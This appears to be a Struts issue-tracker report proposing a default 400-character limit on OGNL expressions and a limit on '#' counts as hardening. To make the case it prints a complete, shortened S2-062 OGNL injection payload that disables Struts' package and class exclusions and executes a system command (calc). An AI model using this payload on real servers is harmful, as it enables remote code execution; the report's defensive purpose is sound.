Description
struts.ognl.expressionMaxLength
default set 400
i reduce the st062 exp
%{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
(#request.a.setBean(#request.get('struts.valueStack'))==true)+
(#request.b=#@org.apache.commons.collections.BeanMap@{})+
(#request.b.setBean(#request.get('a').get('context'))==true)+
(#request.c=#@org.apache.commons.collections.BeanMap@{})+
(#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
(#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))}
it's length is 709, so we default set ognl expression length is 400 could protect our app safe.
and!
i think st2 can give a default num: a expression can have # nums limit like 10
thx
Attachments
Issue Links
- links to